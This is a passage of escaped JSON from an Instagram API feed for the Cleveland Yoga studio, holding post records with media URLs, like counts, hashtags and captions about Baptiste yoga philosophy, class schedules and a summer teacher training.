Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/293ad34b15d381369fd40368a5354524/5D5B90D7/t51.2885-15/e35/s150x150/58790396_2154276601322518_2694546012832333192_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:320,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/ff782a662e57be076ea484dc40284301/5D7185AF/t51.2885-15/e35/s320x320/58790396_2154276601322518_2694546012832333192_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/2e351eb4e3e6ca64c2179f00933cac53/5D5A5152/t51.2885-15/sh0.08/e35/s640x640/58790396_2154276601322518_2694546012832333192_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1557518226&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;17894840365316708&quot;,&quot;text&quot;:&quot;#Repost @jenseaman\n\u30fb\u30fb\u30fb\nBaptiste Yoga Tenet 1: Come from a place of we are all connected. In one word Yoga translates to Unity (or, one). In one word Vinyasa translates to Movement. Vinyasa Yoga - Moving as One. We are all connected. And in that we have a responsibility to each other - to see each other for real and to respect each individual beings place and space on this Earth. We are all connected - my actions affect you. Like a stone dropped into water creates a ripple so does my action create a vibration that stretches beyond me. My actions are not just physical movements but verbal intonations. In vinyasa yoga we acknowledge this connection through breath and movement - moving together as one guided by the truth of our breath. The breath which has no room for judgement, criticism, lust or desire. It\u2019s pure and authentic and you and me are revealed in it. I see you. Namaste \ud83d\udd49\n\nTwo More Classes at @clevelandyoga This Week:\n\n#cylittleitaly \nSaturday 8:45a subbing for the lovely @christinaspallina)\n\n#cywestlake \nSunday 10:15a\n\n#newclassalert CY Little Italy\nWednesday\u2019s 12:15 starting 5/15\n\n#vinyasayoga \n#baptisteyoga\n#weareallconnected\n#iseeyou\n#namaste&quot;,&quot;created_time&quot;:&quot;1557518226&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:65},&quot;tags&quot;:[&quot;newclassalert&quot;,&quot;weareallconnected&quot;,&quot;vinyasayoga&quot;,&quot;baptisteyoga&quot;,&quot;cywestlake&quot;,&quot;repost&quot;,&quot;namaste&quot;,&quot;cylittleitaly&quot;,&quot;iseeyou&quot;],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:1},&quot;type&quot;:&quot;image&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/BxS2f29pKmW/&quot;,&quot;location&quot;:null,&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[]},{&quot;id&quot;:&quot;2039482508730778230_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/d8d7d2d83c13207844f1c4455b26c97a/5D6DB6E0/t51.2885-15/e15/s150x150/58749539_114707442867940_5130853619753050691_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:320,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/685048d71d12e93873bf1d98ead3ccb8/5D6E0710/t51.2885-15/e15/s320x320/58749539_114707442867940_5130853619753050691_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/d055c44cada5b4c242b02840b5654d27/5D708DE6/t51.2885-15/sh0.08/e35/s640x640/58749539_114707442867940_5130853619753050691_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1557345282&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;18030118900150842&quot;,&quot;text&quot;:&quot;Feet grounded down into the earth, hands reaching towards the sky, heart wide open. &rdquo;In this space of LOVE all things are possible.&rdquo; -Baron Baptiste&quot;,&quot;created_time&quot;:&quot;1557345282&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:60},&quot;tags&quot;:[],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:1},&quot;type&quot;:&quot;image&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/BxNsok6hUJ2/&quot;,&quot;location&quot;:{&quot;latitude&quot;:41.50755,&quot;longitude&quot;:-81.5982,&quot;name&quot;:&quot;Cleveland Yoga&quot;,&quot;id&quot;:1793325820761903},&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[]},{&quot;id&quot;:&quot;2033566154414338991_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/5f258fde5d08cf9b67402d40431a2cd9/5D64F850/t51.2885-15/e15/s150x150/57251406_135392480937400_3798883548541234754_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:320,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/9f5616d893e23681bada9d60d58fb489/5D5A02A0/t51.2885-15/e15/s320x320/57251406_135392480937400_3798883548541234754_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/d89c3bf4c25ce619bf0c247f7367b6e2/5D9D4756/t51.2885-15/sh0.08/e35/s640x640/57251406_135392480937400_3798883548541234754_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1556639998&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;17860155013377414&quot;,&quot;text&quot;:&quot;Westlake yogis, good news! Slow Flow is here \ud83d\udc9b\n\nStarting tonight, our Westlake community can enjoy a Slow Flow twice a week. Join @jac_lingler and @chrisjballard on Tuesday&#039;s and Thursday&#039;s respectively for a slowed down version of this powerful practice.\n\nTuesday&#039;s at 7:45pm with Jacqui (used to be Power)\n\nThursday&#039;s at 5:15pm with Chris (used to be Basics)&quot;,&quot;created_time&quot;:&quot;1556639998&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:55},&quot;tags&quot;:[],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:1},&quot;type&quot;:&quot;image&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/Bw4raSlH7Ov/&quot;,&quot;location&quot;:{&quot;latitude&quot;:41.46638,&quot;longitude&quot;:-81.90082,&quot;name&quot;:&quot;Cleveland Yoga&quot;,&quot;id&quot;:156593238299284},&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[]},{&quot;id&quot;:&quot;2033035818218015953_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/32f2b5873363b578316d191397a2252d/5CDF90FD/t51.2885-15/e35/s150x150/57870473_611082469388717_6575694205655707346_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:320,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/d669bb5912c4347686e65b803bd19778/5CDF92CD/t51.2885-15/e35/s320x320/57870473_611082469388717_6575694205655707346_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/bbe10eb108a3b51c74dcadac266018bf/5CDFA2DA/t51.2885-15/sh0.08/e35/s640x640/57870473_611082469388717_6575694205655707346_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1556576796&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;17877825547350138&quot;,&quot;text&quot;:&quot;The word yoga can be translated to mean &rdquo;union&rdquo;.\n\u2800\nUnion between body and breath \nUnion between mind and spirit\nUnion between challenge and release\n\u2800\nWhat does yoga/union mean to you?&quot;,&quot;created_time&quot;:&quot;1556576796&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:41},&quot;tags&quot;:[],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:0},&quot;type&quot;:&quot;video&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/Bw2y04gh8zR/&quot;,&quot;location&quot;:{&quot;latitude&quot;:41.50755,&quot;longitude&quot;:-81.5982,&quot;name&quot;:&quot;Cleveland Yoga&quot;,&quot;id&quot;:1793325820761903},&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[],&quot;videos&quot;:{&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/bd86da57a13069fd1671fb8a3bc8ab8a/5CE0058C/t50.2886-16/59360824_356544624987415_1502989728964673536_n.mp4?efg=eyJ2ZW5jb2RlX3RhZyI6InZ0c192b2RfdXJsZ2VuLjY0MC5mZWVkIn0&amp;_nc_ht=scontent.cdninstagram.com&amp;vtsbc=1&quot;,&quot;id&quot;:&quot;18053805058075358&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:480,&quot;height&quot;:480,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/53a66670d348cfd9932c515e0b2f1762/5CDFC6E1/t50.2886-16/59188703_2358364690880794_764407391599984640_n.mp4?efg=eyJ2ZW5jb2RlX3RhZyI6InZ0c192b2RfdXJsZ2VuLjQ4MC5mZWVkIn0&amp;_nc_ht=scontent.cdninstagram.com&amp;vtsbc=1&quot;,&quot;id&quot;:&quot;18053805052075358&quot;},&quot;low_bandwidth&quot;:{&quot;width&quot;:480,&quot;height&quot;:480,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/53a66670d348cfd9932c515e0b2f1762/5CDFC6E1/t50.2886-16/59188703_2358364690880794_764407391599984640_n.mp4?efg=eyJ2ZW5jb2RlX3RhZyI6InZ0c192b2RfdXJsZ2VuLjQ4MC5mZWVkIn0&amp;_nc_ht=scontent.cdninstagram.com&amp;vtsbc=1&quot;,&quot;id&quot;:&quot;18053805052075358&quot;}}},{&quot;id&quot;:&quot;2030904470730629911_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/91255fcd08c305db08291fccd5170809/5D542C3A/t51.2885-15/e35/s150x150/57506192_131541904603031_542561181910503314_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:320,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/a075edc1221cce7ba7d0e217efbeffbe/5D715B37/t51.2885-15/e35/s320x320/57506192_131541904603031_542561181910503314_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/cbd2baa997dbe314f7c89265cdf5ed58/5D67C3DB/t51.2885-15/sh0.08/e35/s640x640/57506192_131541904603031_542561181910503314_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1556322700&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;17880673249339281&quot;,&quot;text&quot;:&quot;Happy to have you as a part of our team! Happy 2 year CY yoga-anniversary \ud83d\udc9b\ud83d\udc9b #Repost @awaketomysoul\n\u30fb\u30fb\u30fb\nTWO YEARS AGO today I officially joined the Cleveland Yoga teaching team. \u2800\n\u2800\nTwo years ago, even though I didn\u2019t teach Baptiste Yoga they invited me in and gave me a home, welcomed me and told me \u201cJust be yourself. Do you.\u201d \u2800\n\u2800\nI was making it on my own but I can\u2019t tell you how much better it is to do with friends, a team. Friends that lift you when you fall or start to doubt. Friends that teach you how to work the heat 101 times because you don\u2019t have a short term memory! Friends that make you laugh, listen to all the crazy ideas you have in your head. Friends that hear your fears and look you in the eyes and tell you \u201cYOU ARE STRONG. NO NEED TO WORRY. YOU HAVE THIS!\u201d \u2800\n\u2800\nYes in only two years those are the types of bonds I have formed. How? Because CY provides the environment for you to see exactly who you are and ALL ARE WELCOME to be exactly who you are meant to be. \u2800\n\u2800\nBiggest thanks to my friends, @tamischneider27, @clevelandyoga_lissafarkas and @debidarnell and rest of the amazing teachers at CY. \u2800\nBut most importantly thank you to the students who always SHOW UP, READY TO DO THE WORK! \u2800\nI will be forever grateful. \u2800\n\u2800\n#clevelandyoga #clevelandyogarocks #twoyearanniversary&quot;,&quot;created_time&quot;:&quot;1556322700&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:45},&quot;tags&quot;:[&quot;clevelandyoga&quot;,&quot;repost&quot;,&quot;twoyearanniversary&quot;,&quot;clevelandyogarocks&quot;],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:0},&quot;type&quot;:&quot;image&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/BwvONsepuMX/&quot;,&quot;location&quot;:null,&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[]},{&quot;id&quot;:&quot;2030728608519519714_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/38ae1d16158d066f47217a12dcd55821/5CDFCD5D/t51.2885-15/e35/s150x150/58818516_388782455047832_6736362577853578958_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:320,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/b28ede30e29b50c80d699bf07439d069/5CDFB62D/t51.2885-15/e35/s320x320/58818516_388782455047832_6736362577853578958_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/94275d99ea76cd85cecf247fa2ba82a3/5CDF815F/t51.2885-15/e35/58818516_388782455047832_6736362577853578958_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1556301816&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;17958535372268853&quot;,&quot;text&quot;:&quot;#Repost @jenseaman\n\u30fb\u30fb\u30fb\nTheme: In this space I am safe to _____ ...............................\nSequence part 1: Side plank #vasisthasana ..............................\n@clevelandyoga Schedule: \n#cylittleitaly \nToday (Friday) 5:30P\nSaturday 4:30P\n#cywestlake \nSunday 10:15A\n\n#inthisspacewhereicanbreathe \n#inthisspaceiamsafe\n#jipwithatwist\n#awakening&quot;,&quot;created_time&quot;:&quot;1556301816&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:24},&quot;tags&quot;:[&quot;awakening&quot;,&quot;cywestlake&quot;,&quot;inthisspaceiamsafe&quot;,&quot;repost&quot;,&quot;jipwithatwist&quot;,&quot;inthisspacewhereicanbreathe&quot;,&quot;cylittleitaly&quot;,&quot;vasisthasana&quot;],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:0},&quot;type&quot;:&quot;video&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/BwumOkCB33i/&quot;,&quot;location&quot;:null,&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[],&quot;videos&quot;:{&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/0b914c76b5bc779617a60e3a89f8c04e/5CDF6B78/t50.2886-16/59252855_2395446974011253_6277098224977182720_n.mp4?efg=eyJ2ZW5jb2RlX3RhZyI6InZ0c192b2RfdXJsZ2VuLjY0MC5mZWVkIn0&amp;_nc_ht=scontent.cdninstagram.com&amp;vtsbc=1&quot;,&quot;id&quot;:&quot;18062777866049546&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:480,&quot;height&quot;:480,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/42b62c97dfe04d47b0efa52ad99957f5/5CE0053D/t50.2886-16/58916710_386119751981378_1323913717552775168_n.mp4?efg=eyJ2ZW5jb2RlX3RhZyI6InZ0c192b2RfdXJsZ2VuLjQ4MC5mZWVkIn0&amp;_nc_ht=scontent.cdninstagram.com&amp;vtsbc=1&quot;,&quot;id&quot;:&quot;18062777860049546&quot;},&quot;low_bandwidth&quot;:{&quot;width&quot;:480,&quot;height&quot;:480,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/42b62c97dfe04d47b0efa52ad99957f5/5CE0053D/t50.2886-16/58916710_386119751981378_1323913717552775168_n.mp4?efg=eyJ2ZW5jb2RlX3RhZyI6InZ0c192b2RfdXJsZ2VuLjQ4MC5mZWVkIn0&amp;_nc_ht=scontent.cdninstagram.com&amp;vtsbc=1&quot;,&quot;id&quot;:&quot;18062777860049546&quot;}}},{&quot;id&quot;:&quot;2030100945119324769_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/08df72c53833e64dc9257023506fdd3a/5CE096B3/t51.2885-15/e35/s150x150/57490420_2330679060554243_144973906985597266_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:320,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/1211b1a1a28a261714bbcd965ac32d81/5CDFB503/t51.2885-15/e35/s320x320/57490420_2330679060554243_144973906985597266_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/313f5b8153c1c474bfb75873cfc9cf70/5CDFA754/t51.2885-15/sh0.08/e35/s640x640/57490420_2330679060554243_144973906985597266_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1556226955&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;17890105360320602&quot;,&quot;text&quot;:&quot;What are your summer plans? We have an idea \ud83d\ude03\ud83d\udca1become a yoga teacher!\n\u2800\nJoin Tami Schneider and Ylonda Rosenthal-Greene for a special 200-hour Summer Immersion Teacher Training. This intensive program is a collaboration of the highlights of two unique teaching styles.\n\u2800\n@tamischneider27 brings her expertise in training others to lead impactful classes and workshops that focus on the Baptiste Methodology, while Ylonda @awaketomysoul brings her unique understanding of sound, meditation, mantra, yoga philosophy and chakra energy.\n\u2800\nThis epic training will give you the tools to lead from an empowered space, both in your classes and in your life. This program is sure to deliver a beautiful blend of power and soul!\n\u2800\nPROGRAM DATES\n\u2800\nWeek 1\nFriday, June 14-Thursday, June 20\n\u2800\nWeek 2\nFriday, July 19 \u2013 Thursday, July 25\n\u2800\nLink in bio for more information and to register&quot;,&quot;created_time&quot;:&quot;1556226955&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:76},&quot;tags&quot;:[&quot;cleveland&quot;,&quot;fitness&quot;,&quot;wellnesswarrior&quot;,&quot;yogateachertraining&quot;,&quot;yoga&quot;,&quot;healthymind&quot;,&quot;yogapractice&quot;,&quot;yogachallenge&quot;,&quot;yogalife&quot;,&quot;fitnessinspiration&quot;,&quot;fitnessgoals&quot;,&quot;wellnessthatworks&quot;,&quot;yogapose&quot;,&quot;yogateacher&quot;,&quot;fitnessmotivation&quot;,&quot;healthychoices&quot;,&quot;clevelandyoga&quot;,&quot;healthylifestyle&quot;,&quot;healthyliving&quot;,&quot;fitnessjourney&quot;,&quot;yogaeveryday&quot;,&quot;cyytt&quot;,&quot;mindfulnessmatters&quot;,&quot;clevelandyogateachertraining&quot;,&quot;clevelandgram&quot;,&quot;yogainspiration&quot;,&quot;ytt300&quot;,&quot;yogafun&quot;,&quot;yogaflow&quot;,&quot;yogagoals&quot;],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:1},&quot;type&quot;:&quot;video&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/BwsXg28Baph/&quot;,&quot;location&quot;:null,&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[{&quot;user&quot;:{&quot;username&quot;:&quot;tamischneider27&quot;},&quot;position&quot;:{&quot;x&quot;:0,&quot;y&quot;:0}},{&quot;user&quot;:{&quot;username&quot;:&quot;awaketomysoul&quot;},&quot;position&quot;:{&quot;x&quot;:0,&quot;y&quot;:0}}],&quot;videos&quot;:{&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/42c66d9fbc144e49f99505e76192e02c/5CE08F9C/t50.2886-16/58961208_2322787181382246_8802585548175704064_n.mp4?efg=eyJ2ZW5jb2RlX3RhZyI6InZ0c192b2RfdXJsZ2VuLjY0MC5mZWVkIn0&amp;_nc_ht=scontent.cdninstagram.com&amp;vtsbc=1&quot;,&quot;id&quot;:&quot;18023017735165318&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:480,&quot;height&quot;:480,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/660438ecae199efa6c0819b9b51b4685/5CDFFA2D/t50.2886-16/58922265_629268164164722_46092850286297088_n.mp4?efg=eyJ2ZW5jb2RlX3RhZyI6InZ0c192b2RfdXJsZ2VuLjQ4MC5mZWVkIn0&amp;_nc_ht=scontent.cdninstagram.com&amp;vtsbc=1&quot;,&quot;id&quot;:&quot;18023017732165318&quot;},&quot;low_bandwidth&quot;:{&quot;width&quot;:480,&quot;height&quot;:480,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/660438ecae199efa6c0819b9b51b4685/5CDFFA2D/t50.2886-16/58922265_629268164164722_46092850286297088_n.mp4?efg=eyJ2ZW5jb2RlX3RhZyI6InZ0c192b2RfdXJsZ2VuLjQ4MC5mZWVkIn0&amp;_nc_ht=scontent.cdninstagram.com&amp;vtsbc=1&quot;,&quot;id&quot;:&quot;18023017732165318&quot;}}},{&quot;id&quot;:&quot;2027768884522932894_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/592f5e6b2c588c122043f1b156a0318b/5D9E6C2A/t51.2885-15/e15/s150x150/56666989_397506707768977_2394148117322657131_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:320,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/32baac89c6dd2a7425214c17335d9cca/5D6749DA/t51.2885-15/e15/s320x320/56666989_397506707768977_2394148117322657131_n.jpg?_nc_ht=scontent.cdninst